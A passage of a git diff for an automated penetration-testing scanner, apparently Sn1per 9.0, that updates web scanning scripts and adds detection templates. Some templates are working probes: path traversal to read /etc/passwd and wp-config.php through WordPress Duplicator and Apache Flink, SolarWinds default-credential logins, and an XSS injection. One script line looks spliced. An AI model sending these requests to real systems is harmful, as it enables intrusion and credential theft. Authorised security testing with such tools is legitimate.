"${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - clusterd --sVl -i $TARGET -p $PORT 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-port$PORT.txt + clusterd --sVl -i $TARGET -p ${PORT} 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-port${PORT}.txt fi if [[ "$CMSMAP" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING CMSMAP $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - cmsmap https://$TARGET:$PORT | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTa.txt + cmsmap https://$TARGET:${PORT} | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}a.txt echo "" - cmsmap https://$TARGET:$PORT/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTb.txt + cmsmap https://$TARGET:${PORT}/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}b.txt echo "" fi if [[ "$WPSCAN" == "1" ]]; then @@ -309,53 +310,53 @@ if [[ "$MODE" = "webporthttps" ]]; then echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" if [[ "$WP_API_KEY" ]]; then - wpscan --url https://$TARGET:$PORT --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTa.raw + wpscan --url https://$TARGET:${PORT} --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.raw echo "" - wpscan --url https://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTb.raw + wpscan --url https://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.raw echo "" else - wpscan --url https://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTa.raw + wpscan --url https://$TARGET:${PORT} --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.raw echo "" - wpscan --url https://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTb.raw + wpscan --url https://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.raw fi - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTa.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTa.txt - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTb.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTb.txt + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.txt + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.txt rm -f $LOOT_DIR/web/wpscan-$TARGET-http*.raw 2> /dev/null fi if [[ "$NIKTO" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - nikto -h https://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-https-port$PORT.txt - sed -ir "s/ $LOOT_DIR/web/jexboss-$TARGET-port$PORT.txt 2> /dev/null - rm -f $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw 2> /dev/null + python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET:${PORT} | tee $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw > $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.txt 2> /dev/null + rm -f $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw 2> /dev/null cd $INSTALL_DIR fi if [[ "$SMUGGLER" = "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u https://$TARGET:$PORT | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt + python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u https://$TARGET:${PORT} | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt fi if [[ "$NUCLEI" = "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING NUCLEI SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target https://$TARGET:$PORT -o $LOOT_DIR/web/nuclei-https-${TARGET}-port${PORT}.txt + nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target https://$TARGET:${PORT} -o $LOOT_DIR/web/nuclei-https-${TARGET}-port${PORT}.txt fi cd $INSTALL_DIR SSL="true" diff --git a/modes/webscan.sh b/modes/webscan.sh index ad01291a..6755ae1b 100644 --- a/modes/webscan.sh +++ b/modes/webscan.sh @@ -126,6 +126,13 @@ if [[ "$MODE" = "webscan" ]]; then unzip arachni.zip cd $INSTALL_DIR fi + if [[ "$NUCLEI" = "1" ]]; then + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED RUNNING NUCLEI SCAN $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target http://$TARGET -o $LOOT_DIR/web/nuclei-http-${TARGET}-port80.txt + nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target https://$TARGET -o $LOOT_DIR/web/nuclei-https-${TARGET}-port443.txt + fi if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET" diff --git a/sniper b/sniper index c3ba478a..8942f9aa 100755 --- a/sniper +++ b/sniper @@ -8,7 +8,7 @@ if [[ $EUID -ne 0 ]]; then exit 1 fi -VER="8.9" +VER="9.0" INSTALL_DIR="/usr/share/sniper" LOOT_DIR="$INSTALL_DIR/loot/$TARGET" SNIPER_PRO=$INSTALL_DIR/pro.sh diff --git a/sniper.conf b/sniper.conf index ee8df4fd..66234a0b 100644 --- a/sniper.conf +++ b/sniper.conf @@ -12,7 +12,7 @@ REGEX='^[0-9]+$' # DEFAULT SETTINGS AUTO_BRUTE="0" -AUTO_VULNSCAN="0" +VULNSCAN="0" FULLNMAPSCAN="0" OSINT="0" ENABLE_AUTO_UPDATES="1" diff --git a/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal.sh b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal.sh new file mode 100644 index 00000000..d059b24e --- /dev/null +++ b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal' +URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" +METHOD='GET' +MATCH="root\:x" +SEVERITY='P2 - HIGH' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_2.sh b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_2.sh new file mode 100644 index 00000000..04dd5483 --- /dev/null +++ b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_2.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 2' +URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" +METHOD='GET' +MATCH="root\:x" +SEVERITY='P2 - HIGH' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_3.sh b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_3.sh new file mode 100644 index 00000000..6ee2ba14 --- /dev/null +++ b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_3.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 3' +URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php" +METHOD='GET' +MATCH="DB_NAME|DB_USER|COLLATE" +SEVERITY='P2 - HIGH' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_4.sh b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_4.sh new file mode 100644 index 00000000..ba60b14d --- /dev/null +++ b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_4.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 4' +URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php" +METHOD='GET' +MATCH="DB_NAME|DB_USER|COLLATE" +SEVERITY='P2 - HIGH' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh b/templates/active/CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh new file mode 100644 index 00000000..6f714974 --- /dev/null +++ b/templates/active/CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-17519 - Apache Flink Path Traversal' +URI="/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd" +METHOD='GET' +MATCH="root:*:" +SEVERITY='P2 - HIGH' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh new file mode 100644 index 00000000..53a660fc --- /dev/null +++ b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected' +URI='/remote/login?lang=en' +METHOD='GET' +MATCH="launchFortiClient" +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh new file mode 100644 index 00000000..6cc334d1 --- /dev/null +++ b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 1' +URI='/remote/login?lang=en' +METHOD='GET' +MATCH="launchFortiClient" +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_2.sh b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_2.sh new file mode 100644 index 00000000..0a9efb6f --- /dev/null +++ b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_2.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 2' +URI=':10443/remote/login?lang=en' +METHOD='GET' +MATCH="launchFortiClient" +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_3.sh b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_3.sh new file mode 100644 index 00000000..5f6430f7 --- /dev/null +++ b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_3.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 3' +URI=':4443/remote/login?lang=en' +METHOD='GET' +MATCH="launchFortiClient" +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/RabbitMQ_Management_Interface_Detected.sh b/templates/active/RabbitMQ_Management_Interface_Detected.sh new file mode 100644 index 00000000..63558df5 --- /dev/null +++ b/templates/active/RabbitMQ_Management_Interface_Detected.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='RabbitMQ Management Interface Detected' +URI='/' +METHOD='GET' +MATCH="RabbitMQ Management" +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/SolarWinds_Orion_Default_Credentials_1.sh b/templates/active/SolarWinds_Orion_Default_Credentials_1.sh index cf194232..d38d28e1 100644 --- a/templates/active/SolarWinds_Orion_Default_Credentials_1.sh +++ b/templates/active/SolarWinds_Orion_Default_Credentials_1.sh @@ -2,7 +2,7 @@ AUTHOR='@xer0dayz' VULN_NAME='SolarWinds Orion Default Credentials 1' URI='/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS' METHOD='GET' -MATCH="totalRow|Orion|Poller" +MATCH="totalRow" SEVERITY='P2 - HIGH' CURL_OPTS="--user-agent '' -s -L --insecure -H 'Authorization: Basic YWRtaW46' -H 'Content-Type: application/json' " SECONDARY_COMMANDS='' diff --git a/templates/active/SolarWinds_Orion_Default_Credentials_2.sh b/templates/active/SolarWinds_Orion_Default_Credentials_2.sh index 5c5ce101..823f7503 100644 --- a/templates/active/SolarWinds_Orion_Default_Credentials_2.sh +++ b/templates/active/SolarWinds_Orion_Default_Credentials_2.sh @@ -2,7 +2,7 @@ AUTHOR='@xer0dayz' VULN_NAME='SolarWinds Orion Default Credentials 2' URI=':17778/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROW' METHOD='GET' -MATCH="totalRow|Orion|Poller" +MATCH="totalRow" SEVERITY='P2 - HIGH' CURL_OPTS="--user-agent '' -s -L --insecure -H 'Authorization: Basic YWRtaW46' -H 'Content-Type: application/json' " SECONDARY_COMMANDS='' diff --git a/templates/active/XSS.py b/templates/active/XSS.py new file mode 100644 index 00000000..5cd535ce --- /dev/null +++ b/templates/active/XSS.py @@ -0,0 +1,14 @@ +# Import any WebDriver class that you would usually import from +# selenium.webdriver from the seleniumrequests module +import sys +from seleniumrequests import Firefox + +url = sys.argv[1] +# Simple usage with built-in WebDrivers: +webdriver = Firefox() +response = webdriver.request('GET', '%s/xss.php?xss=<script>document.write(INJECTX)</script>' % url) +if '<script>document.write(INJECTX)</script>' in response.text: + print("Vulnerable!") +print(response.text) +webdriver.quit() +SECONDARY_COMMANDS='' diff --git a/templates/passive/web/Fortinet_FortiGate_SSL_VPN_Panel_Passive_Detection.sh b/templates/passive/web/Fortinet_FortiGate_SSL_VPN_Panel_Passive_Detection.sh new file mode 100644 index 00000000..af558365 --- /dev/null +++ b/templates/passive/web/Fortinet_FortiGate_SSL_VPN_Panel_Passive_Detection.sh @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Fortinet FortiGate SSL VPN Panel Passive Detection' +FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" +MATCH="Server\:\ xxxxxxxx-xxxxx" +SEVERITY='P5 - INFO' +GREP_OPTIONS='-i' +SEARCH='positive' +SECONDARY_COMMANDS='' \ No newline at end of file diff --git a/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTP.sh b/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTP.sh new file mode 100644 index 00000000..a232bfee --- /dev/null +++ b/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTP.sh @@ -0,0 +1,19 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Nuclei Vulnerability Scan - HTTP' +FILENAME="$LOOT_DIR/web/nuclei-http-$TARGET-port*.txt" +OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') +GREP_OPTIONS='-ih' + +rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="\[critical\]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P1 - CRITICAL, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="\[high\]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P2 - HIGH, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="\[medium\]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="\[low\]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="\[info\]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null + +cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null \ No newline at end of file diff --git a/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTPS.sh b/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTPS.sh new file mode 100644 index 00000000..835dfb5f --- /dev/null +++ b/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTPS.sh @@ -0,0 +1,19 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Nuclei Vulnerability Scan - HTTPS' +FILENAME="$LOOT_DIR/web/nuclei-https-$TARGET-port*.txt" +OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') +GREP_OPTIONS='-ih' + +rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="\[critical\]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P1 - CRITICAL, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="\[high\]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P2 - HIGH, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="\[medium\]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="\[low\]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="\[info\]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null + +cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null \ No newline at end of file diff --git a/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_1.sh b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_1.sh new file mode 100644 index 00000000..24e8d1ec --- /dev/null +++ b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_1.sh @@ -0,0 +1,12 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Wordpress Vulnerability Scan - HTTPS 1' +FILENAME="$LOOT_DIR/web/wpscan-$TARGET-https-port443a.txt" +OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') +MATCH="Title\:" +GREP_OPTIONS='-ih' + +rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="[+]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null \ No newline at end of file diff --git a/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_2.sh b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_2.sh new file mode 100644 index 00000000..267cfc81 --- /dev/null +++ b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_2.sh @@ -0,0 +1,12 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Wordpress Vulnerability Scan - HTTPS 2' +FILENAME="$LOOT_DIR/web/wpscan-$TARGET-https-port443b.txt" +OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') +MATCH="Title\:" +GREP_OPTIONS='-ih' + +rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="[+]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null \ No newline at end of file diff --git a/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_1.sh b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_1.sh new file mode 100644 index 00000000..0bd09ddb --- /dev/null +++ b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_1.sh @@ -0,0 +1,12 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Wordpress Vulnerability Scan - HTTP 1' +FILENAME="$LOOT_DIR/web/wpscan-$TARGET-http-port80a.txt" +OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') +MATCH="Title\:" +GREP_OPTIONS='-ih' + +rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress 